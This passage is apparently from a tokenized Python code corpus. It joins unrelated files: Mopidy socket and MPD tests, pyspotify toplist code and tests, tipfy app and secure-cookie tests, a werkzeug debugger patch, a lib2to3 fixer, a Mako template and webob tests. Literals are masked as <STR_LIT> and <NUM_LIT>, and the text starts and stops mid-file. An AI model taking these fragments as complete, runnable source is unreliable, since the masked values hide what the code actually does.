<EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . assertEqual ( self . mock . mock_calls , [ <EOL> call . sock . recv ( any_int ) , <EOL> call . disable_recv ( ) , <EOL> call . actor_ref . tell ( { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> def test_recv_callback_recoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> for error in ( errno . EWOULDBLOCK , errno . EINTR ) : <EOL> self . mock . sock . recv . side_effect = socket . error ( error , '<STR_LIT>' ) <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . stop . call_count ) <EOL> def test_recv_callback_unrecoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . recv . side_effect = socket . error <EOL> self . assertTrue ( network . Connection . recv_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_hup ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN | GObject . IO_HUP ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_respects_io_hup_and_io_err ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:1> <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . actor_ref = Mock ( ) <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , <EOL> GObject . IO_IN | GObject . IO_HUP | GObject . IO_ERR ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_send_callback_acquires_and_releases_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:0> <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( False ) <EOL> self . mock . send_lock . release . assert_called_once_with ( ) <EOL> def test_send_callback_fails_to_acquire_lock ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = False <EOL> self . mock . send_buffer = '<STR_LIT>' <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:0> <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send_lock . acquire . assert_called_once_with ( False ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . sock . send . call_count ) <EOL> def test_send_callback_sends_all_data ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT:data>' <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . disable_send . assert_called_once_with ( ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_send_callback_sends_partial_data ( self ) : <EOL> self . mock . send_lock = Mock ( ) <EOL> self . mock . send_lock . acquire . return_value = True <EOL> self . mock . send_buffer = '<STR_LIT:data>' <EOL> self . mock . send . return_value = '<STR_LIT>' <EOL> self . assertTrue ( network . Connection . send_callback ( <EOL> self . mock , sentinel . fd , GObject . IO_IN ) ) <EOL> self . mock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> self . assertEqual ( '<STR_LIT>' , self . mock . send_buffer ) <EOL> def test_send_recoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> for error in ( errno . EWOULDBLOCK , errno . EINTR ) : <EOL> self . mock . sock . send . side_effect = socket . error ( error , '<STR_LIT>' ) <EOL> network . Connection . send ( self . mock , '<STR_LIT:data>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , self . mock . stop . call_count ) <EOL> def test_send_calls_socket_send ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:4> <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . sock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> def test_send_calls_socket_send_partial_send ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . return_value = <NUM_LIT:2> <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . sock . send . assert_called_once_with ( '<STR_LIT:data>' ) <EOL> def test_send_unrecoverable_error ( self ) : <EOL> self . mock . sock = Mock ( spec = socket . SocketType ) <EOL> self . mock . sock . send . side_effect = socket . error <EOL> self . assertEqual ( '<STR_LIT>' , network . Connection . send ( self . mock , '<STR_LIT:data>' ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) <EOL> def test_timeout_callback ( self ) : <EOL> self . mock . timeout = <NUM_LIT:10> <EOL> self . assertFalse ( network . Connection . timeout_callback ( self . mock ) ) <EOL> self . mock . stop . assert_called_once_with ( any_unicode ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> from tests . mpd import protocol <EOL> class ChannelsHandlerTest ( protocol . BaseTestCase ) : <EOL> def test_subscribe ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_unsubscribe ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_channels ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_readmessages ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) <EOL> def test_sendmessage ( self ) : <EOL> self . send_request ( '<STR_LIT>' ) <EOL> self . assertEqualResponse ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> import unittest <EOL> from distutils . version import StrictVersion <EOL> from mopidy import __version__ <EOL> class VersionTest ( unittest . TestCase ) : <EOL> def test_current_version_is_parsable_as_a_strict_version_number ( self ) : <EOL> StrictVersion ( __version__ ) </s>
<s> from __future__ import unicode_literals <EOL> import logging <EOL> import threading <EOL> import spotify <EOL> from spotify import ffi , lib , serialized , utils <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Toplist ( object ) : <EOL> """<STR_LIT>""" <EOL> type = None <EOL> """<STR_LIT>""" <EOL> region = None <EOL> """<STR_LIT>""" <EOL> canonical_username = None <EOL> """<STR_LIT>""" <EOL> loaded_event = None <EOL> """<STR_LIT>""" <EOL> def __init__ ( <EOL> self , session , type = None , region = None , canonical_username = None , <EOL> callback = None , sp_toplistbrowse = None , add_ref = True ) : <EOL> assert ( type is not None and region is not None ) or sp_toplistbrowse , '<STR_LIT>' <EOL> self . _session = session <EOL> self . type = type <EOL> self . region = region <EOL> self . canonical_username = canonical_username <EOL> self . loaded_event = threading . Event ( ) <EOL> if sp_toplistbrowse is None : <EOL> if isinstance ( region , ToplistRegion ) : <EOL> region = int ( region ) <EOL> else : <EOL> region = utils . to_country_code ( region ) <EOL> handle = ffi . new_handle ( ( self . _session , self , callback ) ) <EOL> self . _session . _callback_handles . add ( handle ) <EOL> sp_toplistbrowse = lib . sp_toplistbrowse_create ( <EOL> self . _session . _sp_session , int ( type ) , region , <EOL> utils . to_char_or_null ( canonical_username ) , <EOL> _toplistbrowse_complete_callback , handle ) <EOL> add_ref = False <EOL> if add_ref : <EOL> lib . sp_toplistbrowse_add_ref ( sp_toplistbrowse ) <EOL> self . _sp_toplistbrowse = ffi . gc ( <EOL> sp_toplistbrowse , lib . sp_toplistbrowse_release ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . type , self . region , self . canonical_username ) <EOL> def __eq__ ( self , other ) : <EOL> if isinstance ( other , self . __class__ ) : <EOL> return self . _sp_toplistbrowse == other . _sp_toplistbrowse <EOL> else : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . _sp_toplistbrowse ) <EOL> @ property <EOL> def is_loaded ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( lib . sp_toplistbrowse_is_loaded ( self . _sp_toplistbrowse ) ) <EOL> def load ( self , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> return utils . load ( self . _session , self , timeout = timeout ) <EOL> @ property <EOL> def error ( self ) : <EOL> """<STR_LIT>""" <EOL> return spotify . ErrorType ( <EOL> lib . sp_toplistbrowse_error ( self . _sp_toplistbrowse ) ) <EOL> @ property <EOL> def backend_request_duration ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_loaded : <EOL> return None <EOL> return lib . sp_toplistbrowse_backend_request_duration ( <EOL> self . _sp_toplistbrowse ) <EOL> @ property <EOL> @ serialized <EOL> def tracks ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_track ( sp_toplistbrowse , key ) : <EOL> return spotify . Track ( <EOL> self . _session , <EOL> sp_track = lib . sp_toplistbrowse_track ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_tracks , <EOL> getitem_func = get_track ) <EOL> @ property <EOL> @ serialized <EOL> def albums ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_album ( sp_toplistbrowse , key ) : <EOL> return spotify . Album ( <EOL> self . _session , <EOL> sp_album = lib . sp_toplistbrowse_album ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_albums , <EOL> getitem_func = get_album ) <EOL> @ property <EOL> @ serialized <EOL> def artists ( self ) : <EOL> """<STR_LIT>""" <EOL> spotify . Error . maybe_raise ( self . error ) <EOL> if not self . is_loaded : <EOL> return [ ] <EOL> @ serialized <EOL> def get_artist ( sp_toplistbrowse , key ) : <EOL> return spotify . Artist ( <EOL> self . _session , <EOL> sp_artist = lib . sp_toplistbrowse_artist ( sp_toplistbrowse , key ) , <EOL> add_ref = True ) <EOL> return utils . Sequence ( <EOL> sp_obj = self . _sp_toplistbrowse , <EOL> add_ref_func = lib . sp_toplistbrowse_add_ref , <EOL> release_func = lib . sp_toplistbrowse_release , <EOL> len_func = lib . sp_toplistbrowse_num_artists , <EOL> getitem_func = get_artist ) <EOL> @ ffi . callback ( '<STR_LIT>' ) <EOL> @ serialized <EOL> def _toplistbrowse_complete_callback ( sp_toplistbrowse , handle ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> if handle == ffi . NULL : <EOL> logger . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return <EOL> ( session , toplist , callback ) = ffi . from_handle ( handle ) <EOL> session . _callback_handles . remove ( handle ) <EOL> toplist . loaded_event . set ( ) <EOL> if callback is not None : <EOL> callback ( toplist ) <EOL> @ utils . make_enum ( '<STR_LIT>' ) <EOL> class ToplistRegion ( utils . IntEnum ) : <EOL> pass <EOL> @ utils . make_enum ( '<STR_LIT>' ) <EOL> class ToplistType ( utils . IntEnum ) : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import unittest <EOL> import spotify <EOL> import tests <EOL> from tests import mock <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> class PlaylistUnseenTracksTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . session = tests . create_session_mock ( ) <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> def test_normal_usage ( self , track_lib_mock , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> total_num_tracks = <NUM_LIT:3> <EOL> sp_tracks = [ <EOL> spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> + i ) <EOL> for i in range ( total_num_tracks ) ] <EOL> def func ( sp_pc , sp_p , sp_t , num_t ) : <EOL> for i in range ( min ( total_num_tracks , num_t ) ) : <EOL> sp_t [ i ] = sp_tracks [ i ] <EOL> return total_num_tracks <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . side_effect = func <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> lib_mock . sp_playlistcontainer_add_ref . assert_called_with ( <EOL> sp_playlistcontainer ) <EOL> lib_mock . sp_playlist_add_ref . assert_called_with ( sp_playlist ) <EOL> self . assertEqual ( len ( tracks ) , total_num_tracks ) <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:1> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . assert_called_with ( <EOL> sp_playlistcontainer , sp_playlist , mock . ANY , <NUM_LIT:0> ) <EOL> track0 = tracks [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . assert_called_with ( <EOL> sp_playlistcontainer , sp_playlist , mock . ANY , total_num_tracks ) <EOL> self . assertIsInstance ( track0 , spotify . Track ) <EOL> self . assertEqual ( track0 . _sp_track , sp_tracks [ <NUM_LIT:0> ] ) <EOL> track1 = tracks [ <NUM_LIT:1> ] <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> self . assertIsInstance ( track1 , spotify . Track ) <EOL> self . assertEqual ( track1 . _sp_track , sp_tracks [ <NUM_LIT:1> ] ) <EOL> track2 = tracks [ - <NUM_LIT:3> ] <EOL> self . assertEqual ( track2 . _sp_track , track0 . _sp_track ) <EOL> self . assertEqual ( <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . call_count , <NUM_LIT:2> ) <EOL> def test_raises_error_on_failure ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = - <NUM_LIT:3> <EOL> with self . assertRaises ( spotify . Error ) : <EOL> spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> @ mock . patch ( '<STR_LIT>' , spec = spotify . lib ) <EOL> def test_getitem_with_slice ( self , track_lib_mock , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> total_num_tracks = <NUM_LIT:3> <EOL> sp_tracks = [ <EOL> spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> + i ) <EOL> for i in range ( total_num_tracks ) ] <EOL> def func ( sp_pc , sp_p , sp_t , num_t ) : <EOL> for i in range ( min ( total_num_tracks , num_t ) ) : <EOL> sp_t [ i ] = sp_tracks [ i ] <EOL> return total_num_tracks <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . side_effect = func <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> result = tracks [ <NUM_LIT:0> : <NUM_LIT:2> ] <EOL> self . assertIsInstance ( result , list ) <EOL> self . assertEqual ( len ( result ) , <NUM_LIT:2> ) <EOL> self . assertIsInstance ( result [ <NUM_LIT:0> ] , spotify . Track ) <EOL> self . assertEqual ( result [ <NUM_LIT:0> ] . _sp_track , sp_tracks [ <NUM_LIT:0> ] ) <EOL> self . assertIsInstance ( result [ <NUM_LIT:1> ] , spotify . Track ) <EOL> self . assertEqual ( result [ <NUM_LIT:1> ] . _sp_track , sp_tracks [ <NUM_LIT:1> ] ) <EOL> def test_getitem_raises_index_error_on_too_low_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . assertRaises ( IndexError ) as ctx : <EOL> tracks [ - <NUM_LIT:1> ] <EOL> self . assertEqual ( str ( ctx . exception ) , '<STR_LIT>' ) <EOL> def test_getitem_raises_index_error_on_too_high_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . assertRaises ( IndexError ) as ctx : <EOL> tracks [ <NUM_LIT:1> ] <EOL> self . assertEqual ( str ( ctx . exception ) , '<STR_LIT>' ) <EOL> def test_getitem_raises_type_error_on_non_integral_index ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> with self . assertRaises ( TypeError ) : <EOL> tracks [ '<STR_LIT:abc>' ] <EOL> def test_repr ( self , lib_mock ) : <EOL> sp_playlistcontainer = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> sp_playlist = spotify . ffi . cast ( '<STR_LIT>' , <NUM_LIT> ) <EOL> lib_mock . sp_playlistcontainer_get_unseen_tracks . return_value = <NUM_LIT:0> <EOL> tracks = spotify . PlaylistUnseenTracks ( <EOL> self . session , sp_playlistcontainer , sp_playlist ) <EOL> self . assertEqual ( repr ( tracks ) , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> lib_path = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> if lib_path not in sys . path : <EOL> sys . path [ <NUM_LIT:0> : <NUM_LIT:0> ] = [ <EOL> lib_path , <EOL> os . path . join ( lib_path , '<STR_LIT>' ) , <EOL> os . path . join ( lib_path , '<STR_LIT>' ) , <EOL> ] <EOL> from tipfy . app import App <EOL> from config import config <EOL> from urls import rules <EOL> def enable_appstats ( app ) : <EOL> """<STR_LIT>""" <EOL> from google . appengine . ext . appstats . recording import appstats_wsgi_middleware <EOL> app . dispatch = appstats_wsgi_middleware ( app . dispatch ) <EOL> def enable_jinja2_debugging ( ) : <EOL> """<STR_LIT>""" <EOL> if not debug : <EOL> return <EOL> from google . appengine . tools . dev_appserver import HardenedModulesHook <EOL> HardenedModulesHook . _WHITE_LIST_C_MODULES += [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> debug = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> app = App ( rules = rules , config = config , debug = debug ) <EOL> enable_appstats ( app ) <EOL> enable_jinja2_debugging ( ) <EOL> def main ( ) : <EOL> app . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import unittest <EOL> from tipfy import Tipfy , Request , Response <EOL> from tipfy . sessions import SessionStore , SecureCookieStore , SecureCookieSession <EOL> import test_utils <EOL> class TestSecureCookie ( test_utils . BaseTestCase ) : <EOL> def _get_app ( self ) : <EOL> return Tipfy ( config = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } ) <EOL> def test_get_cookie_no_cookie ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_invalid_parts ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_invalid_signature ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_expired ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' , max_age = - <NUM_LIT> ) , None ) <EOL> def test_get_cookie_badly_encoded ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> timestamp = str ( int ( time . time ( ) ) ) <EOL> value = '<STR_LIT:foo>' <EOL> signature = store . _get_signature ( '<STR_LIT>' , value , timestamp ) <EOL> cookie_value = '<STR_LIT:|>' . join ( [ value , timestamp , signature ] ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' % cookie_value ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , None ) <EOL> def test_get_cookie_valid ( self ) : <EOL> store = SecureCookieStore ( '<STR_LIT>' ) <EOL> request = Request . from_values ( '<STR_LIT:/>' , headers = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( store . get_cookie ( request , '<STR_LIT>' ) , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_utils . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import mimetypes <EOL> import os <EOL> import sys <EOL> import zipfile <EOL> from tipfy . template import Loader , ZipLoader <EOL> _LOADER = None <EOL> TEMPLATE_PATH = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> ZIP_PATH = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def get_loader ( ) : <EOL> global _LOADER <EOL> if _LOADER is None : <EOL> if os . path . exists ( TEMPLATE_PATH ) : <EOL> _LOADER = Loader ( TEMPLATE_PATH ) <EOL> elif os . path . exists ( ZIP_PATH ) : <EOL> _LOADER = ZipLoader ( ZIP_PATH , '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( TEMPLATE_PATH , ZIP_PATH ) ) <EOL> return _LOADER <EOL> def get_template ( filename ) : <EOL> """<STR_LIT>""" <EOL> return get_loader ( ) . load ( filename ) <EOL> def render_template ( filename , ** context ) : <EOL> """<STR_LIT>""" <EOL> return get_template ( filename ) . generate ( ** context ) <EOL> sys . modules [ '<STR_LIT>' ] = sys . modules [ __name__ ] <EOL> from werkzeug . wrappers import BaseResponse as Response <EOL> from werkzeug . debug . console import HTMLStringO <EOL> from werkzeug import DebuggedApplication as DebuggedApplicationBase <EOL> class DebuggedApplication ( DebuggedApplicationBase ) : <EOL> def get_resource ( self , request , filename ) : <EOL> """<STR_LIT>""" <EOL> response = super ( DebuggedApplication , self ) . get_resource ( request , <EOL> filename ) <EOL> if response . status_code != <NUM_LIT> or not os . path . exists ( ZIP_PATH ) : <EOL> return response <EOL> filepath = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , filename ) <EOL> mimetype = mimetypes . guess_type ( filename ) [ <NUM_LIT:0> ] or '<STR_LIT>' <EOL> f = zipfile . ZipFile ( ZIP_PATH , '<STR_LIT:r>' ) <EOL> try : <EOL> response = Response ( f . read ( filepath ) , mimetype = mimetype ) <EOL> return response <EOL> except Exception : <EOL> pass <EOL> finally : <EOL> f . close ( ) <EOL> return Response ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> def seek ( self , n , mode = <NUM_LIT:0> ) : <EOL> pass <EOL> def readline ( self ) : <EOL> if len ( self . _buffer ) == <NUM_LIT:0> : <EOL> return '<STR_LIT>' <EOL> ret = self . _buffer [ <NUM_LIT:0> ] <EOL> del self . _buffer [ <NUM_LIT:0> ] <EOL> return ret <EOL> HTMLStringO . seek = seek <EOL> HTMLStringO . readline = readline </s>
<s> from lib2to3 import fixer_base <EOL> from lib2to3 . fixer_util import Name , BlankLine <EOL> class FixXrange2 ( fixer_base . BaseFix ) : <EOL> PATTERN = "<STR_LIT>" <EOL> def transform ( self , node , results ) : <EOL> node . replace ( Name ( '<STR_LIT>' , prefix = node . prefix ) ) </s>
<s> from mako import runtime , filters , cache <EOL> UNDEFINED = runtime . UNDEFINED <EOL> __M_dict_builtin = dict <EOL> __M_locals_builtin = locals <EOL> _magic_number = <NUM_LIT:5> <EOL> _modified_time = <NUM_LIT> <EOL> _template_filename = '<STR_LIT>' <EOL> _template_uri = '<STR_LIT>' <EOL> _template_cache = cache . Cache ( __name__ , _modified_time ) <EOL> _source_encoding = None <EOL> _exports = [ ] <EOL> def render_body ( context , ** pageargs ) : <EOL> context . caller_stack . _push_frame ( ) <EOL> try : <EOL> __M_locals = __M_dict_builtin ( pageargs = pageargs ) <EOL> __M_writer = context . writer ( ) <EOL> __M_writer ( u'<STR_LIT>' ) <EOL> return '<STR_LIT>' <EOL> finally : <EOL> context . caller_stack . _pop_frame ( ) </s>
<s> from nose . tools import eq_ <EOL> from nose . tools import raises <EOL> import unittest <EOL> def test_cache_control_object_max_age_None ( ) : <EOL> from webob . cachecontrol import CacheControl <EOL> cc = CacheControl ( { } , '<STR_LIT:a>' ) <EOL> cc . properties [ '<STR_LIT>' ] = None <EOL> eq_ ( cc . max_age , - <NUM_LIT:1> ) <EOL> class TestUpdateDict ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . call_queue = [ ] <EOL> def callback ( args ) : <EOL> self . call_queue . append ( "<STR_LIT>" % repr ( args ) ) <EOL> self . callback = callback <EOL> def make_one ( self , callback ) : <EOL> from webob . cachecontrol import UpdateDict <EOL> ud = UpdateDict ( ) <EOL> ud . updated = callback <EOL> return ud <EOL> def test_clear ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert len ( newone ) == <NUM_LIT:1> <EOL> newone . clear ( ) <EOL> assert len ( newone ) == <NUM_LIT:0> <EOL> def test_update ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> d = { '<STR_LIT>' : <NUM_LIT:1> } <EOL> newone . update ( d ) <EOL> assert newone == d <EOL> def test_set_delete ( self ) : <EOL> newone = self . make_one ( self . callback ) <EOL> newone [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> assert len ( self . call_queue ) == <NUM_LIT:1> <EOL> assert self . call_queue [ - <NUM_LIT:1> ] == "<STR_LIT>" <EOL> del newone [ '<STR_LIT>' ] <EOL> assert len ( self . call_queue ) == <NUM_LIT:2> <EOL> assert self . call_queue [ - 